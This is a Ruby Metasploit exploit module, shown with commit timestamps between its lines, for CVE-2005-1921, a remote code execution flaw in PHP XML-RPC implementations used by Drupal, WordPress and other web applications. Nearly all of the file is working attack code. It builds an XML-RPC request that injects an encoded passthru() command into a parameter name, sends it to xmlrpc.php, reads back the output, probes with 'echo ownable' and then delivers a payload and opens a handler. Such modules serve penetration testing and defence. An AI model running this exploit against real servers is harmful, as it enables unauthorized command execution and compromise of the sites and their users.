2007-02-18 00:10:39 +00:00
##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 18:50:46 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
2007-02-18 00:10:39 +00:00
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf :: Exploit :: Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
include Msf :: Exploit :: Remote :: HttpClient
# XXX This module needs an overhaul
def initialize ( info = { } )
super ( update_info ( info ,
'Name' = > 'PHP XML-RPC Arbitrary Code Execution' ,
'Description' = > %q{
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML - RPC module .
This flaw is exploitable through a number of PHP web
applications , including but not limited to Drupal , Wordpress ,
Postnuke , and TikiWiki .
} ,
'Author' = > [ 'hdm' , 'cazz' ] ,
'License' = > MSF_LICENSE ,
'References' = >
[
[ 'CVE' , '2005-1921' ] ,
2016-07-15 17:00:31 +00:00
[ 'OSVDB' , '17793' ] ,
2013-08-30 21:28:54 +00:00
[ 'BID' , '14088' ] ,
] ,
'Privileged' = > false ,
'Platform' = > [ 'unix' ] ,
'Arch' = > ARCH_CMD ,
'Payload' = > {
'Space' = > 512 ,
'DisableNops' = > true ,
'Keys' = > [ 'cmd' , 'cmd_bash' ] ,
} ,
'Targets' = > [ [ 'Automatic' , { } ] , ] ,
'DefaultTarget' = > 0 ,
'DisclosureDate' = > 'Jun 29 2005'
) )
register_options (
[
OptString . new ( 'PATH' , [ true , " Path to xmlrpc.php " , '/xmlrpc.php' ] ) ,
2017-05-03 20:42:21 +00:00
] )
2013-08-30 21:28:54 +00:00
deregister_options (
'HTTP::junk_params' , # not your typical POST, so don't inject params.
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
)
end
def go ( command )
encoded = command . unpack ( " C* " ) . collect { | x | " chr( #{ x } ) " } . join ( '.' )
wrapper = rand_text_alphanumeric ( rand ( 128 ) + 32 )
cmd = " echo(' #{ wrapper } '); passthru( #{ encoded } ); echo(' #{ wrapper } ');; "
xml =
'<?xml version="1.0"?>' +
" <methodCall> " +
" <methodName> " + rand_text_alphanumeric ( rand ( 128 ) + 32 ) + " </methodName> " +
" <params><param> " +
" <name> " + rand_text_alphanumeric ( rand ( 128 ) + 32 ) + " '); #{ cmd } //</name> " +
" <value> " + rand_text_alphanumeric ( rand ( 128 ) + 32 ) + " </value> " +
" </param></params> " +
" </methodCall> " ;
res = send_request_cgi ( {
'uri' = > normalize_uri ( datastore [ 'PATH' ] ) ,
'method' = > 'POST' ,
'ctype' = > 'application/xml' ,
'data' = > xml ,
} , 5 )
if ( res and res . body )
b = / #{ wrapper } (.*) #{ wrapper } /sm . match ( res . body )
if b
return b . captures [ 0 ]
2016-03-06 05:11:39 +00:00
elsif datastore [ 'HTTP::chunked' ]
2013-08-30 21:28:54 +00:00
b = / chunked Transfer-Encoding forbidden / . match ( res . body )
if b
2015-04-16 19:56:42 +00:00
fail_with ( Failure :: BadConfig , 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.' )
2013-08-30 21:28:54 +00:00
end
end
end
return nil
end
def check
response = go ( " echo ownable " )
if ( ! response . nil? and response =~ / ownable /sm )
return Exploit :: CheckCode :: Vulnerable
end
return Exploit :: CheckCode :: Safe
end
def exploit
response = go ( payload . encoded )
if response == nil
print_error ( 'exploit failed: no response' )
else
if response . length == 0
2017-07-19 11:48:52 +00:00
print_good ( 'Exploit Successful' )
2013-08-30 21:28:54 +00:00
else
print_status ( " Command returned #{ response } " )
end
handler
end
end
2009-07-16 16:02:24 +00:00
end
